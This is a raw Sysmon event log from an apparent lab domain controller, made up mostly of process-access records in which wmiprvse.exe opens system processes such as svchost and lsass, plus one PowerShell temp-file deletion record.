16:53:45.107{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A8AA-00000000AD01}13600C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A8AA-00000000AD01}13600C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002239351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dk1auwco.b1h.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D99-603E-A8AA-00000000AD01}1360016188C:\Windows\system32\conhost.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 